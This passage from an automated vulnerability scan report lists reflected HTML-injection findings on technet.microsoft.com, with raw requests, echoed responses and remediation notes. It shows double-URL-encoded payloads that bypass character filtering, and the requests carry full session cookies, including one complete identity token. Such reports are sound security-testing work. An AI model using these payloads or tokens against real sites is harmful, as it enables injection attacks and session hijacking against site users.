Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us46021%2522%253e%253ca%253eead3e3d9a48/library/bb625087.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46021"><a>ead3e3d9a48/library/bb625087" />
...[SNIP]...

2.158. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb625087.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b7ce%2522%253e%253ca%253e513411c4713 was submitted in the REST URL parameter 2. This input was echoed as 7b7ce"><a>513411c4713 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library7b7ce%2522%253e%253ca%253e513411c4713/bb625087.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library7b7ce"><a>513411c4713/bb625087" />
...[SNIP]...

2.159. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb625087.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da43a%2522%253e%253ca%253ef735b7a07d3 was submitted in the REST URL parameter 3. This input was echoed as da43a"><a>f735b7a07d3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb625087.aspxda43a%2522%253e%253ca%253ef735b7a07d3 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb625087.aspxda43a"><a>f735b7a07d3" />
...[SNIP]...

2.160. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb726976.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7577%2522%253e%253ca%253eacf3b7933c9 was submitted in the REST URL parameter 1. This input was echoed as d7577"><a>acf3b7933c9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd7577%2522%253e%253ca%253eacf3b7933c9/library/bb726976.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7577"><a>acf3b7933c9/library/bb726976" />
...[SNIP]...

2.161. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb726976.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828a9%2522%253e%253ca%253eb8ea94052da was submitted in the REST URL parameter 2. This input was echoed as 828a9"><a>b8ea94052da in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library828a9%2522%253e%253ca%253eb8ea94052da/bb726976.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library828a9"><a>b8ea94052da/bb726976" />
...[SNIP]...

2.162. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb726976.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdec4%2522%253e%253ca%253e9c59d07c487 was submitted in the REST URL parameter 3. This input was echoed as fdec4"><a>9c59d07c487 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb726976.aspxfdec4%2522%253e%253ca%253e9c59d07c487 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; 
__qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726976.aspxfdec4"><a>9c59d07c487" />
...[SNIP]...

2.163. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb727024.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b79%2522%253e%253ca%253e6e48a9d51bc was submitted in the REST URL parameter 1. This input was echoed as d7b79"><a>6e48a9d51bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd7b79%2522%253e%253ca%253e6e48a9d51bc/library/bb727024.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 